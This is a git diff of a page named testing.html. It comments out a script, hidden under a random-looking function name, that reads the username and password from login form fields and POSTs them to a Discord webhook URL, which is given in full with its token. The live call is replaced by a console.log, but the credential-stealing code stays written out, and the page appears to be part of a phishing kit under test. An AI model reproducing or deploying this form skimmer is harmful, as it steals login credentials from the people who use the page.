--- a/testing.html
+++ b/testing.html
@@ -46,10 +46,11 @@
 	</script>
 	<script defer>
 		function testsdjoappfaskpof() {
-			fetch('https://discord.com/api/webhooks/1301483051653533707/4Zq3BT1n4PZOmTpQIT40a8MxV62ejnlQmBSniy1Mb3_jr3qTgfOfZM54PQKg7rAWUWzl',{
-				method:'POST',
-				headers: {'Content-Type':'application/json'},
-				body:JSON.stringify({content: document.getElementsByClassName("form-login__input")[0].value+" | "+document.getElementsByClassName("form-login__input")[1].value})})
+			console.log("TEST")
+			// fetch('https://discord.com/api/webhooks/1301483051653533707/4Zq3BT1n4PZOmTpQIT40a8MxV62ejnlQmBSniy1Mb3_jr3qTgfOfZM54PQKg7rAWUWzl',{
+			// 	method:'POST',
+			// 	headers: {'Content-Type':'application/json'},
+			// 	body:JSON.stringify({content: document.getElementsByClassName("form-login__input")[0].value+" | "+document.getElementsByClassName("form-login__input")[1].value})})
 		}
 	</script>
 <link rel="stylesheet" href="https://code.jivosite.com/css/d1dc0ec/widget.css" class="jv-css"></head>
